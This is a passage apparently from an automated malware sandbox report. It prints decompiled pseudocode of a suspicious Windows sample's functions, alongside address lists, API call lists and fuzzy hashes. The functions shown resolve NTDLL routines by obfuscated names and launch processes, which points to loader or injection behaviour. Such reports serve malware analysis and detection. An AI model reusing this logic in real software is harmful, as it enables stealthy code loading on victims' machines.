							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                                          0x04c0ac64
                                                          0x04c0ac7a
                                                          0x04c0ac80
                                                          0x04c0ac82
                                                          0x04c0ac87
                                                          0x04c0ac8d
                                                          0x04c0ac92
                                                          0x04c0ac95
                                                          0x04c0aca3
                                                          0x04c0acaa
                                                          0x04c0acad
                                                          0x04c0acb0
                                                          0x04c0acb1
                                                          0x04c0acb4
                                                          0x04c0acb7
                                                          0x04c0acba
                                                          0x04c0acbf
                                                          0x04c0acce
                                                          0x00000000
                                                          0x04c0acd4
                                                          0x04c0acde
                                                          0x04c0ace8
                                                          0x04c0aced
                                                          0x04c0acef
                                                          0x04c0acf9
                                                          0x04c0acfc
                                                          0x04c0acff
                                                          0x04c0ad05
                                                          0x04c0ad07
                                                          0x04c0ad07
                                                          0x04c0ad0a
                                                          0x04c0ad0d
                                                          0x04c0ad12
                                                          0x04c0ad16
                                                          0x04c0ad29
                                                          0x04c0ad2b
                                                          0x04c0add3
                                                          0x04c0add3
                                                          0x04c0adda
                                                          0x04c0addd
                                                          0x04c0ade7
                                                          0x04c0ade7
                                                          0x04c0adeb
                                                          0x04c0ae69
                                                          0x04c0ae6c
                                                          0x04c0ae6e
                                                          0x04c0ae6e
                                                          0x04c0ae75
                                                          0x04c0ae77
                                                          0x04c0ae81
                                                          0x04c0ae84
                                                          0x04c0ae87
                                                          0x04c0ae87
                                                          0x00000000
                                                          0x04c0aded
                                                          0x04c0adf0
                                                          0x04c0ae1e
                                                          0x04c0ae28
                                                          0x04c0ae2c
                                                          0x04c0ae34
                                                          0x04c0ae37
                                                          0x04c0ae3e
                                                          0x04c0ae48
                                                          0x04c0ae48
                                                          0x04c0ae4c
                                                          0x04c0ae51
                                                          0x04c0ae60
                                                          0x04c0ae66
                                                          0x04c0ae66
                                                          0x04c0ae4c
                                                          0x00000000
                                                          0x04c0adf7
                                                          0x04c0adfa
                                                          0x04c0ae02
                                                          0x04c0ae17
                                                          0x04c0ae1c
                                                          0x00000000
                                                          0x00000000
                                                          0x04c0ae1c
                                                          0x00000000
                                                          0x04c0ae02
                                                          0x04c0adf0
                                                          0x04c0adeb
                                                          0x04c0ad31
                                                          0x04c0ad38
                                                          0x04c0ad48
                                                          0x04c0ad51
                                                          0x04c0ad55
                                                          0x04c0ad98
                                                          0x04c0ada4
                                                          0x04c0adcd
                                                          0x04c0ada6
                                                          0x04c0adaa
                                                          0x04c0adb0
                                                          0x04c0adb8
                                                          0x04c0adba
                                                          0x04c0adbd
                                                          0x04c0adc3
                                                          0x04c0adc5
                                                          0x04c0adc5
                                                          0x04c0adb8
                                                          0x04c0adaa
                                                          0x00000000
                                                          0x04c0ada4
                                                          0x04c0ad5d
                                                          0x04c0ad60
                                                          0x04c0ad67
                                                          0x04c0ad77
                                                          0x04c0ad7a
                                                          0x04c0ad8a
                                                          0x00000000
                                                          0x04c0ad90
                                                          0x04c0ad71
                                                          0x04c0ad75
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c0ad75
                                                          0x04c0ad42
                                                          0x04c0ad46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c0ad46
                                                          0x04c0ad1f
                                                          0x04c0ad23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04C0ACCE
                                                          • LoadLibraryA.KERNEL32(?), ref: 04C0AD4B
                                                          • GetLastError.KERNEL32 ref: 04C0AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04C0AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: de7c6579dbc3751815e5a8bc7e13304d6962b2234889ff3e6cfa584ef321f38e
                                                          • Instruction ID: 2c75a880f7efa60ee010aa7cd198ab9ce7846358c915421a11d6e1df37a1e3c2
                                                          • Opcode Fuzzy Hash: de7c6579dbc3751815e5a8bc7e13304d6962b2234889ff3e6cfa584ef321f38e
                                                          • Instruction Fuzzy Hash: D8816C75A00305AFDB14CFA8D880BAEB7F6FF58314F158129E915E7280EBB5EA44CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C06C38, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 27%
                                                          			E04C06C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x4c0d33c; // 0x6889798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04C0A557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x4c0c18c;
				}
				_t46 = E04C018A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04C0A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x4c0d2a8; // 0x1c7a5a8
						_t16 = _t75 + 0x4c0eb08; // 0x530025
						 *0x4c0d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04C0A557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x4c0c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04C0A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E04C0A734(_v20);
						} else {
							_t66 =  *0x4c0d2a8; // 0x1c7a5a8
							_t31 = _t66 + 0x4c0ec28; // 0x73006d
							 *0x4c0d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E04C0A734(_v12);
				}
				return _v24;
			}




























                                                          0x04c06c40
                                                          0x04c06c46
                                                          0x04c06c4d
                                                          0x04c06c53
                                                          0x04c06c57
                                                          0x04c06c5b
                                                          0x04c06c5e
                                                          0x04c06c63
                                                          0x04c06c68
                                                          0x04c06c6a
                                                          0x04c06c6a
                                                          0x04c06c73
                                                          0x04c06c78
                                                          0x04c06c7d
                                                          0x04c06c83
                                                          0x04c06c8d
                                                          0x04c06c96
                                                          0x04c06c9d
                                                          0x04c06cb6
                                                          0x04c06cbb
                                                          0x04c06cc0
                                                          0x04c06cc9
                                                          0x04c06cd2
                                                          0x04c06ce3
                                                          0x04c06cec
                                                          0x04c06cf0
                                                          0x04c06cf4
                                                          0x04c06cf9
                                                          0x04c06cfe
                                                          0x04c06d00
                                                          0x04c06d00
                                                          0x04c06d0a
                                                          0x04c06d13
                                                          0x04c06d1a
                                                          0x04c06d32
                                                          0x04c06d36
                                                          0x04c06d73
                                                          0x04c06d38
                                                          0x04c06d3b
                                                          0x04c06d43
                                                          0x04c06d54
                                                          0x04c06d60
                                                          0x04c06d68
                                                          0x04c06d6c
                                                          0x04c06d6c
                                                          0x04c06d36
                                                          0x04c06d7b
                                                          0x04c06d80
                                                          0x04c06d87

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04C06C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04C06C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 04C06C96
                                                          • lstrlen.KERNEL32(00000000), ref: 04C06C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 04C06CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 04C06D0A
                                                          • lstrlen.KERNEL32(?), ref: 04C06D13
                                                          • lstrlen.KERNEL32(?), ref: 04C06D1A
                                                          • lstrlenW.KERNEL32(?), ref: 04C06D21
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 92bb128763c7cf6131a24e44b5c9accab2dddf70685212266837f47343ad3f1e
                                                          • Instruction ID: be7895e2df47ccd12c75aa5da5c7501302a6c4c024bd4f12736018e63a2b647c
                                                          • Opcode Fuzzy Hash: 92bb128763c7cf6131a24e44b5c9accab2dddf70685212266837f47343ad3f1e
                                                          • Instruction Fuzzy Hash: 0B415076D00219FBDF11AFA4CC08ADEBBB6EF44318F068150E905A7250DB35EB50EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C08EA1, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E04C08EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04C0592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04C0A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x4c0d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x4c0d2a8; // 0x1c7a5a8
					_t18 = _t47 + 0x4c0e3e6; // 0x73797325
					_t68 = E04C03C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x4c0d2a8; // 0x1c7a5a8
						_t19 = _t50 + 0x4c0e747; // 0x6888cef
						_t20 = _t50 + 0x4c0e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04C0A62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04C0A62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4c0d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04C0A734(_t70);
				goto L12;
			}


















                                                          0x04c08ea9
                                                          0x04c08ea9
                                                          0x04c08eb8
                                                          0x04c08ebf
                                                          0x04c08ec4
                                                          0x04c08fd1
                                                          0x04c08fd8
                                                          0x04c08fd8
                                                          0x04c08ed3
                                                          0x04c08edb
                                                          0x04c08ede
                                                          0x04c08ee3
                                                          0x04c08ef8
                                                          0x04c08efe
                                                          0x04c08eff
                                                          0x04c08f02
                                                          0x04c08f08
                                                          0x04c08f0b
                                                          0x04c08f10
                                                          0x04c08f18
                                                          0x04c08f24
                                                          0x04c08f28
                                                          0x04c08fb8
                                                          0x04c08f2e
                                                          0x04c08f2e
                                                          0x04c08f33
                                                          0x04c08f3a
                                                          0x04c08f4e
                                                          0x04c08f52
                                                          0x04c08fa1
                                                          0x04c08f54
                                                          0x04c08f55
                                                          0x04c08f5c
                                                          0x04c08f75
                                                          0x04c08f77
                                                          0x04c08f7b
                                                          0x04c08f82
                                                          0x04c08f9c
                                                          0x04c08f84
                                                          0x04c08f8d
                                                          0x04c08f92
                                                          0x04c08f92
                                                          0x04c08f82
                                                          0x04c08fb0
                                                          0x04c08fb0
                                                          0x04c08f28
                                                          0x04c08fbf
                                                          0x04c08fc8
                                                          0x04c08fcc
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 04C0592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04C08EBD,?,00000001,?,?,00000000,00000000), ref: 04C05952
                                                            • Part of subcall function 04C0592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04C05974
                                                            • Part of subcall function 04C0592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04C0598A
                                                            • Part of subcall function 04C0592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04C059A0
                                                            • Part of subcall function 04C0592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04C059B6
                                                            • Part of subcall function 04C0592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04C059CC
                                                          • memset.NTDLL ref: 04C08F0B
                                                            • Part of subcall function 04C03C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04C08F24,73797325), ref: 04C03C59
                                                            • Part of subcall function 04C03C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04C03C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,06888CEF,73797325), ref: 04C08F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 04C08F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C08FB0
                                                            • Part of subcall function 04C0A62D: GetProcAddress.KERNEL32(36776F57,04C0A2D4), ref: 04C0A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04C08F8D
                                                          • CloseHandle.KERNEL32(?), ref: 04C08F92
                                                          • GetLastError.KERNEL32(00000001), ref: 04C08F96
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: 6bc76dfe6927423a548ac19558c6ddb3c4b0588d3584e7a7a6c9672fc79376bc
                                                          • Instruction ID: 25abca832b90584cccd6d29ab0bba828fc000d5e550adb2c1770afb5351d719a
                                                          • Opcode Fuzzy Hash: 6bc76dfe6927423a548ac19558c6ddb3c4b0588d3584e7a7a6c9672fc79376bc
                                                          • Instruction Fuzzy Hash: 103152B6900208BFDB10AFE4CC88E9EBBBEEF04358F058565E606A7150D735AE44DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C01BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E04C01BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4c0d2a8; // 0x1c7a5a8
				_t1 = _t9 + 0x4c0e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04C0173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E04C0A71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04C064EF(_t34, _t41, _a8);
						E04C0A734(_t41);
						_t42 = E04C06467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04C0A734(_t36);
							_t36 = _t42;
						}
						_t43 = E04C017E5(_t36, _t33);
						if(_t43 != 0) {
							E04C0A734(_t36);
							_t36 = _t43;
						}
					}
					E04C0A734(_t28);
				}
				return _t36;
			}














                                                          0x04c01bb6
                                                          0x04c01bb9
                                                          0x04c01bba
                                                          0x04c01bc2
                                                          0x04c01bc9
                                                          0x04c01bd0
                                                          0x04c01bd4
                                                          0x04c01bda
                                                          0x04c01be1
                                                          0x04c01be6
                                                          0x04c01bf8
                                                          0x04c01bfc
                                                          0x04c01c00
                                                          0x04c01c06
                                                          0x04c01c0b
                                                          0x04c01c1b
                                                          0x04c01c1d
                                                          0x04c01c34
                                                          0x04c01c38
                                                          0x04c01c3b
                                                          0x04c01c40
                                                          0x04c01c40
                                                          0x04c01c49
                                                          0x04c01c4d
                                                          0x04c01c50
                                                          0x04c01c55
                                                          0x04c01c55
                                                          0x04c01c4d
                                                          0x04c01c58
                                                          0x04c01c58
                                                          0x04c01c63

                                                          APIs
                                                            • Part of subcall function 04C0173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,04C01BD0,253D7325,00000000,00000000,7742C740,?,?,04C020C2,?), ref: 04C017A4
                                                            • Part of subcall function 04C0173D: sprintf.NTDLL ref: 04C017C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,04C020C2,?,068895B0), ref: 04C01BE1
                                                          • lstrlen.KERNEL32(?,?,?,04C020C2,?,068895B0), ref: 04C01BE9
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • strcpy.NTDLL ref: 04C01C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04C01C0B
                                                            • Part of subcall function 04C064EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04C01C1A,00000000,?,?,?,04C020C2,?,068895B0), ref: 04C06506
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C020C2,?,068895B0), ref: 04C01C28
                                                            • Part of subcall function 04C06467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04C01C34,00000000,?,?,04C020C2,?,068895B0), ref: 04C06471
                                                            • Part of subcall function 04C06467: _snprintf.NTDLL ref: 04C064CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 0a89939afd5821cc990dd96552b123b4c61de121218a7ccd4ec10b6e8cd94586
                                                          • Instruction ID: 03f64e3417ec9133a4db6aa4a062e1183675ff9844f7cff9efabc5d81b658987
                                                          • Opcode Fuzzy Hash: 0a89939afd5821cc990dd96552b123b4c61de121218a7ccd4ec10b6e8cd94586
                                                          • Instruction Fuzzy Hash: 9B114C3B501224779716BBF89C84C7F7AAFCE4576830AC115F60097180DE39FD42A7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C06891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04C068EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 04C068FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04C06911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C06979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C06988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C06993
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: c2f333163f3c0d973cc8be8a8dc653f8b1bdbe1da976334666a38688c0cb021d
                                                          • Instruction ID: 027d71db5fe3fe6c7f2544a24f77e2a2e4b625f13f975a98639eacb7351b4770
                                                          • Opcode Fuzzy Hash: c2f333163f3c0d973cc8be8a8dc653f8b1bdbe1da976334666a38688c0cb021d
                                                          • Instruction Fuzzy Hash: F7415136A00609AFDF01DFBCD84469EB7BAEF49300F158425E914EB260DA71EE15CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C0592D, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04C0592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04C0A71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4c0d2a8; // 0x1c7a5a8
					_t1 = _t23 + 0x4c0e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4c0d2a8; // 0x1c7a5a8
					_t2 = _t26 + 0x4c0e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04C0A734(_t54);
					} else {
						_t30 =  *0x4c0d2a8; // 0x1c7a5a8
						_t5 = _t30 + 0x4c0e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4c0d2a8; // 0x1c7a5a8
							_t7 = _t33 + 0x4c0e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4c0d2a8; // 0x1c7a5a8
								_t9 = _t36 + 0x4c0e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4c0d2a8; // 0x1c7a5a8
									_t11 = _t39 + 0x4c0e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04C06604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                          0x04c0593c
                                                          0x04c05940
                                                          0x04c05a02
                                                          0x04c05946
                                                          0x04c05946
                                                          0x04c0594b
                                                          0x04c0595e
                                                          0x04c05960
                                                          0x04c05965
                                                          0x04c0596d
                                                          0x04c05974
                                                          0x04c05976
                                                          0x04c0597b
                                                          0x04c059fa
                                                          0x04c059fb
                                                          0x04c0597d
                                                          0x04c0597d
                                                          0x04c05982
                                                          0x04c0598a
                                                          0x04c0598c
                                                          0x04c05991
                                                          0x00000000
                                                          0x04c05993
                                                          0x04c05993
                                                          0x04c05998
                                                          0x04c059a0
                                                          0x04c059a2
                                                          0x04c059a7
                                                          0x00000000
                                                          0x04c059a9
                                                          0x04c059a9
                                                          0x04c059ae
                                                          0x04c059b6
                                                          0x04c059b8
                                                          0x04c059bd
                                                          0x00000000
                                                          0x04c059bf
                                                          0x04c059bf
                                                          0x04c059c4
                                                          0x04c059cc
                                                          0x04c059ce
                                                          0x04c059d3
                                                          0x00000000
                                                          0x04c059d5
                                                          0x04c059db
                                                          0x04c059e0
                                                          0x04c059e7
                                                          0x04c059ec
                                                          0x04c059f1
                                                          0x00000000
                                                          0x04c059f3
                                                          0x04c059f6
                                                          0x04c059f6
                                                          0x04c059f1
                                                          0x04c059d3
                                                          0x04c059bd
                                                          0x04c059a7
                                                          0x04c05991
                                                          0x04c0597b
                                                          0x04c05a10

                                                          APIs
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04C08EBD,?,00000001,?,?,00000000,00000000), ref: 04C05952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04C05974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04C0598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04C059A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04C059B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04C059CC
                                                            • Part of subcall function 04C06604: memset.NTDLL ref: 04C06683
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: 0976aab3c0cd7544d31268296fceb7176eaec25b7fc8802c063cceaae1936ea7
                                                          • Instruction ID: 7b0207727372b97a8935ee5ee7f9ccd26351e39026bcc43abf8840deec4fb20a
                                                          • Opcode Fuzzy Hash: 0976aab3c0cd7544d31268296fceb7176eaec25b7fc8802c063cceaae1936ea7
                                                          • Instruction Fuzzy Hash: 532160B560070AAFE710DFADC884E6AB7FDEF043047028565E54AC7261E774EE458F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C0853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
